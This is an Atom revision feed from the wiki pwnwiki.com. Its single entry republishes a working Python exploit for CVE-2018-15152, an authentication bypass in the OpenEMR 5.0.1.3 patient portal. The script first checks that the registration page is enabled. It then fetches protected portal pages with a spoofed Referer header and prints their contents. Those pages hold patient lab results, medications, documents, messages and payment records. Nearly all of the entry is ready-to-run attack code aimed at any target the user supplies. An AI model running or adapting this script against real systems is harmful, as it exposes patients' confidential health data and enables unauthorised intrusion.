<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-15152 OpenEMR 5.0.1.3 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T02:47:27Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=5176&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass # Date 15.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: ht...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-15152_OpenEMR_5.0.1.3_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=5176&amp;oldid=prev"/>
		<updated>2021-06-16T09:28:53Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: OpenEMR 5.0.1.3 - &amp;#039;/portal/account/register.php&amp;#039; Authentication Bypass # Date 15.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: ht...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass&lt;br /&gt;
# Date 15.06.2021&lt;br /&gt;
# Exploit Author: Ron Jost (Hacker5preme)&lt;br /&gt;
# Vendor Homepage: https://www.open-emr.org/&lt;br /&gt;
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip&lt;br /&gt;
# Version: All versions prior to 5.0.1.4&lt;br /&gt;
# Tested on: Ubuntu 18.04&lt;br /&gt;
# CVE: CVE-2018-15152&lt;br /&gt;
# CWE: CWE-287&lt;br /&gt;
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Description:&lt;br /&gt;
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to&lt;br /&gt;
the registration page and modifying the requested url to access the desired page. Some&lt;br /&gt;
examples of pages in the portal directory that are accessible after browsing to the&lt;br /&gt;
registration page include:&lt;br /&gt;
- add_edit_event_user.php&lt;br /&gt;
- find_appt_popup_user.php&lt;br /&gt;
- get_allergies.php&lt;br /&gt;
- get_amendments.php&lt;br /&gt;
- get_lab_results.php&lt;br /&gt;
- get_medications.php&lt;br /&gt;
- get_patient_documents.php&lt;br /&gt;
- get_problems.php&lt;br /&gt;
- get_profile.php&lt;br /&gt;
- portal_payment.php&lt;br /&gt;
- messaging/messages.php&lt;br /&gt;
- messaging/secure_chat.php&lt;br /&gt;
- report/pat_ledger.php&lt;br /&gt;
- report/portal_custom_report.php&lt;br /&gt;
- report/portal_patient_report.php&lt;br /&gt;
Normally, access to these pages requires authentication as a patient. If a user were to visit&lt;br /&gt;
any of those pages unauthenticated, they would be redirected to the login page.&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Import required modules:&lt;br /&gt;
'''&lt;br /&gt;
import requests&lt;br /&gt;
import argparse&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
User-Input:&lt;br /&gt;
'''&lt;br /&gt;
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')&lt;br /&gt;
my_parser.add_argument('-T', '--IP', type=str)&lt;br /&gt;
my_parser.add_argument('-P', '--PORT', type=str)&lt;br /&gt;
my_parser.add_argument('-U', '--Openemrpath', type=str)&lt;br /&gt;
my_parser.add_argument('-R', '--PathToGet', type=str)&lt;br /&gt;
args = my_parser.parse_args()&lt;br /&gt;
target_ip = args.IP&lt;br /&gt;
target_port = args.PORT&lt;br /&gt;
openemr_path = args.Openemrpath&lt;br /&gt;
pathtoread = args.PathToGet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Check for vulnerability:&lt;br /&gt;
'''&lt;br /&gt;
# Check, if Registration portal is enabled. If it is not, this exploit can not work&lt;br /&gt;
session = requests.Session()&lt;br /&gt;
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'&lt;br /&gt;
check_vuln = session.get(check_vuln_url).text&lt;br /&gt;
print('')&lt;br /&gt;
print('[*] Checking vulnerability: ')&lt;br /&gt;
print('')&lt;br /&gt;
&lt;br /&gt;
if &amp;quot;Enter email address to receive registration.&amp;quot; in check_vuln:&lt;br /&gt;
    print('[+] Host Vulnerable. Proceeding exploit')&lt;br /&gt;
else:&lt;br /&gt;
    print('[-] Host is not Vulnerable: Registration for patients is not enabled')&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Exploit:&lt;br /&gt;
'''&lt;br /&gt;
header = {&lt;br /&gt;
    'Referer': check_vuln_url&lt;br /&gt;
}&lt;br /&gt;
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread&lt;br /&gt;
Exploit = session.get(exploit_url, headers=header)&lt;br /&gt;
print('')&lt;br /&gt;
print('[+] Results: ')&lt;br /&gt;
print('')&lt;br /&gt;
print(Exploit.text)&lt;br /&gt;
print('')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>